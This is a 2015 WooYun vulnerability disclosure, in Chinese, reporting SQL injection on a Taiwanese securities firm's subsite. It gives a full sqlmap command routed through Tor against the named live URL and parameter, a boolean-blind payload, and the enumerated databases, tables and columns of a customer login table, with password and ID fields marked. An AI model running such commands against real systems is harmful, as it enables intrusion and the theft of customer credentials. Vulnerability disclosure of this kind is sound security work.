台湾某证券公司分站SQL注入 | wooyun-2015-0121910| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0121910

漏洞标题：台湾某证券公司分站SQL注入

漏洞作者：路人甲

提交时间：2015-06-25 15:00

修复时间：2015-06-30 15:02

公开时间：2015-06-30 15:02

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：16

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-25：细节已通知厂商并且等待厂商处理中
2015-06-30：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

台湾某证券公司分站SQL注入

详细说明：

./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=B --union-char=n -u "https://wmtrade.pscnet.com.tw/wm/activity/show_activity.php?flag=B&mun=216" -p mun --dbs --is-dba --current-user  --threads=4
Parameter: mun (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: flag=B&mun=216' AND 6588=6588 AND 'Rimb'='Rimb

漏洞证明：

available databases [6]:
[*] information_schema
[*] LOGIN    ====> 拿这个做例子
[*] mysql
[*] test
[*] TRUST  ==> 这个库应该也是用户数据 
[*] WM ==> 这个库应该也是用户数据 
current user is DBA:    True   ====> 是DBA
	
-D LOGIN --tables 
Database: LOGIN
[5 tables]
+-------------+
| assets2     |
| branch_main |
| cust_login  |
| cust_name   |
| management  |
+-------------+
Database: LOGIN
Table: cust_login
[12 columns]
+------------------+-------------+
| Column           | Type        |
+------------------+-------------+
| associator       | varchar(2)  |
| creat_date       | date        |
| custid           | varchar(12) |   ====>怀疑是身份证
| first_login      | char(1)     |
| first_login_time | datetime    |
| login_cnt        | int(1)      |
| login_last_time  | datetime    |
| luck_chk         | char(1)     |
| luck_time        | datetime    |
| modify_date      | timestamp   |
| nlpass           | varchar(20) | ====>怀疑是密码
| nvuser           | varchar(20) | 
+------------------+-------------+
Database: LOGIN
+------------+---------+
| Table      | Entries |
+------------+---------+
| cust_login | 1162    |  ===>几千用户受到影响
+------------+---------+

BTW: 仅证明漏洞存在,未dump任何用户资讯

修复方案：

过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-06-30 15:02

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0121910

漏洞标题：台湾某证券公司分站SQL注入

相关厂商：台湾統一綜合證券

漏洞作者：路人甲

提交时间：2015-06-25 15:00

修复时间：2015-06-30 15:02

公开时间：2015-06-30 15:02

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：16

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0121910

漏洞标题：台湾某证券公司分站SQL注入

相关厂商：台湾統一綜合證券

漏洞作者： 路人甲

提交时间：2015-06-25 15:00

修复时间：2015-06-30 15:02

公开时间：2015-06-30 15:02

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：16

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0121910"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云